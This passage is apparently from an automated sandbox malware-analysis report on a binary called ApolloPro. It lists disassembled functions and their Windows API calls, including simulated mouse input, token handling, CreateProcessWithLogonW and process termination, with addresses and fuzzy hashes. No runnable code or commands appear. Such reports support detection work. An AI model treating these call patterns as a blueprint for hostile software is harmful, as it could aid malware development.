                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: f75d476f509d3dfcb7535963c33097f9a6bcfa9a0d1034a75c6f5c5deab07def
                                                                                              • Instruction ID: a21c0819039c1233123598aefbda8d23a719654b05e15446e09d3c2e0ffe18ac
                                                                                              • Opcode Fuzzy Hash: f75d476f509d3dfcb7535963c33097f9a6bcfa9a0d1034a75c6f5c5deab07def
                                                                                              • Instruction Fuzzy Hash: 02414F74600544EFDB26CF14C499BE47BE2BF05314F1851A9EA488F3A2C7B5E886CB61
                                                                                              Function 006A7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,006A550C,?,?,00000000,00000001), ref: 006A7796
                                                                                                • Part of subcall function 006A406C: GetWindowRect.USER32(?,?), ref: 006A407F
                                                                                              • GetDesktopWindow.USER32 ref: 006A77C0
                                                                                              • GetWindowRect.USER32(00000000), ref: 006A77C7
                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006A77F9
                                                                                                • Part of subcall function 006957FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00695877
                                                                                              • GetCursorPos.USER32(?), ref: 006A7825
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006A7883
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                              • String ID:
                                                                                              • API String ID: 4137160315-0
                                                                                              • Opcode ID: 459a61fe43f5bd65a96397c859790628d5d04bf52a9734f702467b0689c3a205
                                                                                              • Instruction ID: 89b1d9ec03e198cbbed4a1b8c9b6833b91ad6f4246e5eab7961aa5f88a786002
                                                                                              • Opcode Fuzzy Hash: 459a61fe43f5bd65a96397c859790628d5d04bf52a9734f702467b0689c3a205
                                                                                              • Instruction Fuzzy Hash: D131D272509305ABD720EF54CC49FABB7AAFF89314F000929F59597191CA74ED09CFA2
                                                                                              Function 00689431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00688CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00688CDE
                                                                                                • Part of subcall function 00688CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00688CE8
                                                                                                • Part of subcall function 00688CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00688CF7
                                                                                                • Part of subcall function 00688CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00688CFE
                                                                                                • Part of subcall function 00688CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00688D14
                                                                                              • GetLengthSid.ADVAPI32(?,00000000,0068904D), ref: 00689482
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0068948E
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00689495
                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 006894AE
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0068904D), ref: 006894C2
                                                                                              • HeapFree.KERNEL32(00000000), ref: 006894C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                              • String ID:
                                                                                              • API String ID: 3008561057-0
                                                                                              • Opcode ID: 93320dc43cf4b647cc71a0adf8301b9eae6ff6f3b2ab332ad2617f1ea5436efa
                                                                                              • Instruction ID: e33c33965a4d4f00b766ca9466ec929e19f30e75ce79549b41a9a951b54d76f4
                                                                                              • Opcode Fuzzy Hash: 93320dc43cf4b647cc71a0adf8301b9eae6ff6f3b2ab332ad2617f1ea5436efa
                                                                                              • Instruction Fuzzy Hash: 87117F72601604FFEB10AFA4CC09FFEBBBAEB45315F188258E84597210C7359945CB60
                                                                                              Function 006891CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00689200
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00689207
                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00689216
                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00689221
                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00689250
                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00689264
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                              • String ID:
                                                                                              • API String ID: 1413079979-0
                                                                                              • Opcode ID: e5893889883b3aec4b394077a9d9ffe15e3883757955b681e0756e2f25295251
                                                                                              • Instruction ID: 5bfc99b3b62ab172af5e4583c78fbf85057dccd2ed802e686015cbd24bdeb9cb
                                                                                              • Opcode Fuzzy Hash: e5893889883b3aec4b394077a9d9ffe15e3883757955b681e0756e2f25295251
                                                                                              • Instruction Fuzzy Hash: 9E11477250124AEBEB019F94ED49FEE7BAAEB48704F084155FE05A2160C2769E61EB60
                                                                                              Function 0068C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0068C34E
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0068C35F
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0068C366
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0068C36E
                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0068C385
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0068C397
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: a37b21610a44981f5c12a7ea7a4339fb9e1aded2c282c889ecaf47160c9cfb04
                                                                                              • Instruction ID: 57ef11d4a09c3182ee21e9635a9018e2115f3cfca6ddc91fbfe55e78d7e04a12
                                                                                              • Opcode Fuzzy Hash: a37b21610a44981f5c12a7ea7a4339fb9e1aded2c282c889ecaf47160c9cfb04
                                                                                              • Instruction Fuzzy Hash: 8F012175E00218BBEB109BA69C49E5ABFA9EB58761F044165FA04AB280D6719911CFA0
                                                                                              Function 006BC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00631729
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631738
                                                                                                • Part of subcall function 006316CF: BeginPath.GDI32(?), ref: 0063174F
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631778
                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 006BC57C
                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 006BC590
                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006BC59E
                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 006BC5AE
                                                                                              • EndPath.GDI32(00000000), ref: 006BC5BE
                                                                                              • StrokePath.GDI32(00000000), ref: 006BC5CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                              • String ID:
                                                                                              • API String ID: 43455801-0
                                                                                              • Opcode ID: e22a9908562bd5e539979bbe32ed9d55463f5bd8061b0e3e39185acdda9cf19a
                                                                                              • Instruction ID: f1d5731adf92523a04a9d6c55b289959fcd44f29b0c527d962a2f1057457208f
                                                                                              • Opcode Fuzzy Hash: e22a9908562bd5e539979bbe32ed9d55463f5bd8061b0e3e39185acdda9cf19a
                                                                                              • Instruction Fuzzy Hash: BB110C7200414CBFEF129F90DC48EEA7F6EEB04354F048021B9185A160C771AEA5DBA0
                                                                                              Function 006507BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006507EC
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 006507F4
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006507FF
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0065080A
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00650812
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0065081A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: fe8ab533470aba78c97abd479ca27351924bac6159cbe189b160724c1a107e26
                                                                                              • Instruction ID: 4669a0c3c35164c3a627b00f14add453dc6943bce318c0981fe6a1f542ba86c7
                                                                                              • Opcode Fuzzy Hash: fe8ab533470aba78c97abd479ca27351924bac6159cbe189b160724c1a107e26
                                                                                              • Instruction Fuzzy Hash: B6016CB0901759BDE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                                                              Function 006959A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006959B4
                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006959CA
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 006959D9
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006959E8
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006959F2
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006959F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 839392675-0
                                                                                              • Opcode ID: 9a91c26eac18309966b5a0edf6c065b056155056837f52dd3111f9b0bf2fe87b
                                                                                              • Instruction ID: 93e79504e04b44b13ab13e5ca7f15d00f0cc59827864a16d2f6f80cf82d718e6
                                                                                              • Opcode Fuzzy Hash: 9a91c26eac18309966b5a0edf6c065b056155056837f52dd3111f9b0bf2fe87b
                                                                                              • Instruction Fuzzy Hash: 3CF06732240158FBF7215B929C0EEFF7A3DEBCAB21F000159FA0591050EBA01A1186B5
                                                                                              Function 006977EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 006977FE
                                                                                              • EnterCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 0069780F
                                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,0063C2B6,?,?), ref: 0069781C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0063C2B6,?,?), ref: 00697829
                                                                                                • Part of subcall function 006971F0: CloseHandle.KERNEL32(00000000,?,00697836,?,0063C2B6,?,?), ref: 006971FA
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0069783C
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 00697843
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: 82c7f6cfd381b83e47fb1f09f2955db94a88fa998274b1d2a758c5e26a6eead8
                                                                                              • Instruction ID: 21e1237cac05d90903fd4e4a376871f04268e093d710798ec9e130b8d3b8fbd5
                                                                                              • Opcode Fuzzy Hash: 82c7f6cfd381b83e47fb1f09f2955db94a88fa998274b1d2a758c5e26a6eead8
                                                                                              • Instruction Fuzzy Hash: A1F05E32145212EBE7112B64EC8CEFB772FFF45302F142425F102954A0CBB95901DB60
                                                                                              Function 0068954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00689555
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00689561
                                                                                              • CloseHandle.KERNEL32(?), ref: 0068956A
                                                                                              • CloseHandle.KERNEL32(?), ref: 00689572
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0068957B
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00689582
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: 266d434c5e59f971c7cc957562e5735d2480193532040ae285c10ab3784564d4
                                                                                              • Instruction ID: 5a3a4be1f4e0bd0617adea486e3abc42226ea6937fa03008d95445c1f538b36b
                                                                                              • Opcode Fuzzy Hash: 266d434c5e59f971c7cc957562e5735d2480193532040ae285c10ab3784564d4
                                                                                              • Instruction Fuzzy Hash: 9BE0E53A004542FBEB011FE6EC0CD6AFF3AFF49722B145220F21981470CB32A460DB60
                                                                                              Function 006A8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 006A8CFD
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 006A8E0C
                                                                                              • VariantClear.OLEAUT32(?), ref: 006A8F84
                                                                                                • Part of subcall function 00697B1D: VariantInit.OLEAUT32(00000000), ref: 00697B5D
                                                                                                • Part of subcall function 00697B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00697B66
                                                                                                • Part of subcall function 00697B1D: VariantClear.OLEAUT32(00000000), ref: 00697B72
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4237274167-1221869570
                                                                                              • Opcode ID: 3b089261656444d9861bd46d5bba504d28ad03dabaa81a5ba9756ce07c06243e
                                                                                              • Instruction ID: 35107e92c72b6aa473c839f2a769cef5e51921fc824acc655c88312182a51cb4
                                                                                              • Opcode Fuzzy Hash: 3b089261656444d9861bd46d5bba504d28ad03dabaa81a5ba9756ce07c06243e
                                                                                              • Instruction Fuzzy Hash: B6915C706043019FC750EF24C48495ABBE6EF9A354F14896EF88A8B3A1DB30ED45CF91
                                                                                              Function 0069323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                              • _memset.LIBCMT ref: 0069332E
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0069335D
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00693410
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0069343E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                              • String ID: 0
                                                                                              • API String ID: 4152858687-4108050209
                                                                                              • Opcode ID: ace624e30ae836405ba0bf1c93c023dceebcc2608ab474d8b55d23f6b2e51a9b
                                                                                              • Instruction ID: 58ad5a49c9b81e2baf7868e00407873a5b8b07c315a14911122cbd759e4be82f
                                                                                              • Opcode Fuzzy Hash: ace624e30ae836405ba0bf1c93c023dceebcc2608ab474d8b55d23f6b2e51a9b
                                                                                              • Instruction Fuzzy Hash: 6B51E1312083219BDB269F28C845AABBBEEAF45B60F04092DF891D37D1DB30CE44C756
                                                                                              Function 00692EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00692F67
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00692F83
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00692FC9
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006F7890,00000000), ref: 00693012
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1173514356-4108050209
                                                                                              • Opcode ID: 6231f30c345a0c70bc261c67672d4efa242c0bdefd46a1e21b8a70b143e48967
                                                                                              • Instruction ID: 121f644a033de87b91bb9ade58db19723467add298a96a5148874de2e5572766
                                                                                              • Opcode Fuzzy Hash: 6231f30c345a0c70bc261c67672d4efa242c0bdefd46a1e21b8a70b143e48967
                                                                                              • Instruction Fuzzy Hash: 3D41C331204352AFDB20DF24C894F6ABBEAAF85310F14461DF465973D1D770EA05CB56
                                                                                              Function 00689A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00689ACC
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00689ADF
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00689B0F
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 365058703-1403004172
